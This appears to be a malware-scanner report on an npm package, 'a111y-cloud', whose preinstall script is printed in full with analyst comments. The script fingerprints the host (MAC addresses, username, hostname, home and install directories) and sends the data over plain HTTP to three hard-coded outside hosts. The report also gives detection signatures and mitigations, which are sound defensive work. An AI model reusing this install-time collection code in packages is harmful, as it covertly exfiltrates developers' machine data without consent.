Sandworm scans all new npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our X / Twitter feed for updates.
a111y-cloud:
Detected: 12 Nov 2024
Detected Date: 12 Nov 2024
Affected Install Script: preinstall
Package Source: View on npm
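The code collects sensitive information such as the MAC addresses, home directory, username, and hostname of the machine and sends this data to multiple remote servers without user consent. Because it is wired to the preinstall hook, the collection runs automatically during installation, before the package is ever imported by any application code. This could be exploited to track users or compromise their privacy, making it a clear security risk.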
Install script: node index.js
Install script code:
const os = require("os");
const querystring = require("querystring");
const http = require("http");
const fs = require("fs");
const packageJSON = require("./package.json");
// Name declared in the package's own package.json. It is sent as the
// `package` field of the beacon built below, so the receiver can tell which
// published package produced each report.
const packageName = packageJSON.name;
/**
 * Collects the MAC address of every network interface reported by
 * os.networkInterfaces(), de-duplicates them, joins them with commas and
 * returns the result base64-encoded.
 *
 * Analyst note: base64 is an encoding, not encryption. The value can be
 * decoded directly from a captured request to recover the list of hardware
 * addresses that left the host.
 *
 * @returns {string} Base64 of the comma-separated unique MAC addresses.
 */
function getMacAddressesBase64() {
const networkInterfaces = os.networkInterfaces();
const macAddresses = [];
for (const interfaceName in networkInterfaces) {
const interfaces = networkInterfaces[interfaceName];
interfaces.forEach((iface) => {
// The truthiness test only drops empty/undefined values; an all-zero MAC
// string is still truthy and is kept. `includes` prevents duplicates.
if (iface.mac && !macAddresses.includes(iface.mac)) {
macAddresses.push(iface.mac);
}
});
}
const macString = macAddresses.join(",");
return Buffer.from(macString).toString("base64");
}
// Everything below runs at module load, i.e. as soon as `node index.js` is
// executed by the install hook. No function call or import by the victim's
// own code is required.
const macAddressesBase64 = getMacAddressesBase64();
// Host fingerprint, URL-encoded as a query string. Fields sent:
//   package       - name from package.json
//   dir           - __dirname, the directory this script was installed into
//                   (reveals the local project / node_modules path)
//   homedir       - current user's home directory
//   hostname      - machine hostname
//   mac_addresses - base64 of the comma-separated MAC list
//   username      - current OS account name
// These six parameter names together are a usable detection signature for
// proxy and HTTP logs.
const trackingData = querystring.stringify({
package: packageName,
dir: __dirname,
homedir: os.homedir(),
hostname: os.hostname(),
mac_addresses: macAddressesBase64,
username: os.userInfo().username,
});
// Hard-coded destination hostnames: network indicators to hunt for in DNS
// and egress logs and to block at the resolver or proxy.
// NOTE(review): the "oast" labels suggest out-of-band interaction callback
// endpoints; that is inferred from the names only - confirm before attributing.
const addresses = [
"dnipqouebm-psl.cn.oast-cn.byted-dast.com",
"oqvignkp58-psl.i18n.oast-row.byted-dast.com",
"sbfwstspuutiarcjzptfutygntsslnz7p.oast.fun"
];
/**
 * Returns a pseudo-random integer between 10000 and 99999 inclusive, drawn
 * from Math.random().
 *
 * Analyst note: the value ends up as a URL path segment, so the full request
 * path differs from run to run. Signatures should not match on it.
 *
 * @returns {number} Five-digit integer.
 */
function generateRandomFiveDigitNumber() {
return Math.floor(10000 + Math.random() * 90000);
}
// Generated once, outside the loop: all three requests from a single install
// carry the same number, which lets the separate beacons be correlated.
const randomNumber = generateRandomFiveDigitNumber();
// Sends the same fingerprint to every hard-coded host.
// Detection: outbound plain-HTTP GET on port 80 whose path starts with
// `/realtime_p/npm/` followed by the query keys built above.
// Mitigation: installing with npm's `--ignore-scripts` stops lifecycle hooks
// such as this one from executing.
addresses.forEach((hostname) => {
const options = {
hostname: hostname,
port: "80",
path: `/realtime_p/npm/${randomNumber}?${trackingData}`,
method: "GET",
// `rejectUnauthorized` is a TLS setting, but the request is made with the
// `http` module on port 80, so the collected data travels unencrypted and is
// visible to (and loggable by) any on-path inspection device.
rejectUnauthorized: false
};
const req = http.request(options, (res) => {
res.on("data", (d) => {
// Any response body is written to stdout.
console.log(`Response from ${hostname}:`, d.toString());
});
});
// Failures are only logged; nothing is thrown and the process is not exited
// here, so an unreachable or blocked destination does not abort the script.
req.on("error", (e) => {
console.error(`Error with request to ${hostname}:`, e);
});
req.end();
});